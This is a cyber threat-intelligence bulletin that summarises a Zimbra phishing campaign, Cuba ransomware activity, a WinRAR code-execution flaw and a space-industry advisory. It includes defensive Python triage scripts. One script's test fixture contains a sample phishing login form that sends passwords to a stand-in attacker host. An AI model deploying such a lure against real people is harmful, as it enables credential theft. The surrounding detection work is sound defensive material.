Malware Activity
New Social Engineering Campaign Targeting Zimbra Collaboration Users
Researchers have uncovered a "mass-spreading" social engineering campaign targeting Zimbra users within small and medium businesses as well as government entities. The campaign has been observed primarily in Poland, Ecuador, and Italy, and targets users of Zimbra Collaboration, an "open-core collaborative software platform" that is commonly deployed as an alternative to enterprise email suites. The threat actor behind the campaign has not been attributed, and the goal appears to be the collection of account credentials. Targets receive a phishing email warning of an email server update, account deactivation, or a similar issue, which prompts the user to open an attached HTML file containing the phishing page. The sender address is spoofed to appear as the email server administrator. When the attachment is opened, it renders in the victim's browser as a fraudulent Zimbra login page customized to the targeted organization. Researchers noted that the username field of the fake login form is prefilled, making the page appear more legitimate. If the user submits credentials, they are sent to an actor-controlled command-and-control (C2) server. The campaign has been active since April 2023. Additional technical details as well as indicators of compromise (IOCs) can be viewed in the report linked below.
- The Hacker News: Zimbra-Based Social Engineering Campaign Article
- ESET: Zimbra-Based Social Engineering Campaign Report
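As an added example (not code from the ESET or The Hacker News reports), the following triage helper inspects an HTML email attachment for the traits of the lure described above: a login form that collects a password and posts it to a host other than the organization's real Zimbra web client, and a username field that arrives already filled in. The sample attachments, host names, and trusted-host list are constructed for illustration.

```python
"""Triage an HTML email attachment for Zimbra-style credential phishing.

Added example, not from the original page or the ESET report. The sample
HTML, host names and the trusted-host set below are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormCollector(HTMLParser):
    """Collects every <form> with its action URL and the <input> tags inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyze_attachment(html, trusted_hosts):
    """Return findings for forms that look like credential harvesters.

    trusted_hosts: host names where the organization's real Zimbra login lives.
    A form is reported when it collects a password and either posts outside
    trusted_hosts or ships with the username already filled in (both traits of
    the campaign described above). Each finding lists the form action and the
    reasons it was flagged.
    """
    parser = _FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        types = {(i.get("type") or "text").lower() for i in form["inputs"]}
        if "password" not in types:
            continue  # not a login form; nothing to harvest
        host = urlparse(form["action"]).hostname or ""
        prefilled = [
            i for i in form["inputs"]
            if (i.get("type") or "text").lower() in ("text", "email") and i.get("value")
        ]
        reasons = []
        if host not in trusted_hosts:
            reasons.append(f"posts credentials to untrusted host {host!r}")
        if prefilled:
            names = ", ".join(i.get("name") or "?" for i in prefilled)
            reasons.append(f"username prefilled ({names})")
        if reasons:
            findings.append({"action": form["action"], "reasons": reasons})
    return findings


# Constructed lure: prefilled username, password posted to an attacker host.
SAMPLE_LURE = """<html><body>
<h2>Zimbra Web Client</h2>
<form method="post" action="https://mail-update.example-attacker.test/login">
  <input type="text" name="username" value="jdoe@example.test">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form></body></html>"""

# Constructed benign form: posts to the organization's own Zimbra host.
SAMPLE_LEGIT = """<html><body>
<form method="post" action="https://mail.example.test/">
  <input type="text" name="username">
  <input type="password" name="password">
</form></body></html>"""

TRUSTED = {"mail.example.test"}  # assumed real Zimbra host for this org

if __name__ == "__main__":
    for label, doc in (("lure", SAMPLE_LURE), ("legit", SAMPLE_LEGIT)):
        print(label, analyze_attachment(doc, TRUSTED))
```

A relative form action (empty host) is treated as untrusted on purpose: an HTML file opened from disk has no Zimbra origin to post back to, so a relative action in an attachment is itself a sign that the form is not what it claims to be.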
Threat Actor Activity
Threat Profile: Cuba Ransomware
Activity related to the Cuba ransomware gang has increased in the past several weeks after security researchers uncovered an ongoing campaign by associated threat actors targeting United States critical infrastructure. The Cuba ransomware gang, whose ransomware is also tracked as Fidel and COLDDRAW, has been active since 2019 and specializes in the compromise and exploitation of organizations throughout Ukraine, Latin America, and, more recently, the United States. Like many modern ransomware operations, the group uses double-extortion tactics, exfiltrating data before encryption and threatening to leak it. Malicious payloads often deployed in Cuba ransomware attacks include the "RomCom" remote access trojan (RAT) and the "Industrial Spy" malware. In a recent campaign, Cuba ransomware actors have been observed compromising organizations through a vulnerability in Veeam Backup & Replication, tracked as CVE-2023-27532. This vulnerability allows an unauthenticated attacker with network access to the backup infrastructure to retrieve the encrypted credentials stored in the Veeam configuration database, which can then be used to gain access to backup infrastructure hosts. According to security researchers, Cuba ransomware actors attempted to compromise a critical infrastructure organization within the United States through this Veeam vulnerability. Additional technical details of the recent Cuba ransomware campaign, including detailed malware analysis, tactics, and techniques, are provided in the reports below. CTIX continues to monitor threat actor activity worldwide and will provide additional updates accordingly.
Vulnerabilities
Vulnerability in RARLAB WinRAR Allows Attackers to Conduct RCE
A high-severity vulnerability has been identified in WinRAR, the file archiving and compression tool for Windows. WinRAR is used to back up and compress data, reduce the size of email attachments, extract RAR, ZIP, and other archives downloaded from the internet, and create new archives in the RAR and ZIP formats. The flaw, tracked as CVE-2023-40477, stems from improper validation of user-supplied data during the processing of recovery volumes, which can result in memory access past the end of an allocated buffer. If successfully exploited, the vulnerability could allow a threat actor to execute arbitrary code in the context of the current process on a vulnerable WinRAR installation. Although the impact is severe, the vulnerability received a CVSS score of 7.8 because exploitation requires user interaction: a threat actor would first need to trick the victim into visiting a malicious page or opening a maliciously crafted archive, typically via a social engineering attack such as phishing. The vulnerability affects all versions of WinRAR prior to 6.23, which contains the fix. CTIX analysts recommend that users ensure they are running the most recent version of the software.
- The Hacker News: CVE-2023-40477 Article
- WinRAR: CVE-2023-40477 Advisory
- Zero Day Initiative: CVE-2023-40477 Advisory
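Because the delivery vector is a crafted archive handed to a user, a practical stopgap while vulnerable builds remain in the fleet is to identify RAR-family attachments by their signature bytes rather than by file extension, so a renamed archive does not slip past an extension-based rule. The following is an added example (not WinRAR's, ZDI's, or the article's code) that does that and pairs it with a check of the installed WinRAR version against 6.23, the first fixed release named above. The attachments and the version strings are constructed; the RAR4 and RAR5 signature bytes are the published archive markers.

```python
"""Flag RAR-family attachments by signature and check WinRAR version.

Added example, not from the original page. Attachment bytes and version
strings below are constructed for illustration.
"""
from pathlib import PurePosixPath

RAR5_SIG = b"Rar!\x1a\x07\x01\x00"  # RAR 5.0 archive signature (8 bytes)
RAR4_SIG = b"Rar!\x1a\x07\x00"      # RAR 1.5 through 4.x signature (7 bytes)
FIXED_VERSION = (6, 23)             # first WinRAR release without CVE-2023-40477


def rar_format(data):
    """Return 'RAR5', 'RAR4' or None based on the leading signature bytes."""
    if data.startswith(RAR5_SIG):
        return "RAR5"
    if data.startswith(RAR4_SIG):
        return "RAR4"
    return None


def parse_version(text):
    """'6.22' -> (6, 22); tolerates a trailing tag such as '6.23 beta 1'.

    Tuples compare numerically, so '6.9' correctly sorts below '6.23'.
    """
    core = text.strip().split()[0]
    return tuple(int(part) for part in core.split("."))


def is_vulnerable(winrar_version):
    """True when the installed build predates the 6.23 fix."""
    return parse_version(winrar_version) < FIXED_VERSION


def triage(attachments, winrar_version):
    """attachments: iterable of (filename, bytes). Returns [(filename, reasons)].

    Only RAR-family content is reported. Recovery volumes (.rev) are the code
    path affected by CVE-2023-40477, so both .rar and .rev are accepted as
    honest extensions; anything else carrying a RAR signature is called out as
    a disguised archive.
    """
    findings = []
    fixed = ".".join(str(n) for n in FIXED_VERSION)
    for name, data in attachments:
        fmt = rar_format(data)
        if fmt is None:
            continue
        reasons = [f"{fmt} archive by signature"]
        ext = PurePosixPath(name).suffix.lower()
        if ext not in (".rar", ".rev"):
            reasons.append(f"extension {ext or '(none)'} hides a RAR archive")
        if is_vulnerable(winrar_version):
            reasons.append(f"WinRAR {winrar_version} is below {fixed}")
        findings.append((name, reasons))
    return findings


# Constructed sample attachments: a plain .rar, a RAR renamed to .pdf, and text.
SAMPLE_ATTACHMENTS = [
    ("invoice.rar", RAR5_SIG + b"\x00" * 16),
    ("report.pdf", RAR4_SIG + b"\x00" * 16),
    ("notes.txt", b"plain text, nothing to see"),
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_ATTACHMENTS, "6.22"):
        print(name, "->", "; ".join(reasons))
```

The signature check is deliberately format-only: it does not parse archive headers, so it cannot tell a benign archive from a crafted one. Its job is to route every RAR-family attachment to the same policy (block, sandbox, or warn) until endpoints report 6.23 or later.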
Honorable Mention
New Advisory Warns of Foreign Attacks on Space Industry
The Federal Bureau of Investigation (FBI), the National Counterintelligence and Security Center (NCSC), and the Air Force Office of Special Investigations (AFOSI) published an advisory on August 18, 2023, warning of increasing cyberattacks against United States-based space companies by suspected foreign intelligence services. The advisory notes the space industry's growing importance to the global economy and the increasing dependence of critical infrastructure on space-based assets, which make the sector a valuable target for foreign intelligence entities (FIEs). FIEs view US space-related innovation and assets both as a potential threat and as an opportunity to acquire technologies and proprietary data. Methods of gaining access to the US space industry have included cyberattacks and the targeting of key supply chain nodes, as well as foreign strategic investments such as joint ventures and acquisitions. The threat is multi-layered: the advisory warns that cyberattacks target not only intellectual property and the raw data collected by satellites, but are also staged to identify vulnerabilities within space infrastructure in order to gain disruptive capabilities. Space infrastructure is increasingly fundamental to almost every aspect of society, from emergency services to the energy, financial, telecommunications, transportation, and food and agriculture sectors. With industries relying ever more heavily on space services to operate, the sector is an increasingly sought-after target, and many have repeatedly urged that space be formally designated a critical infrastructure sector. CTIX analysts will continue to monitor attacks against the space industry and provide updates as necessary.
The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to the Flash Team (flash@ankura.com) if additional context is needed.
© Copyright 2023. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.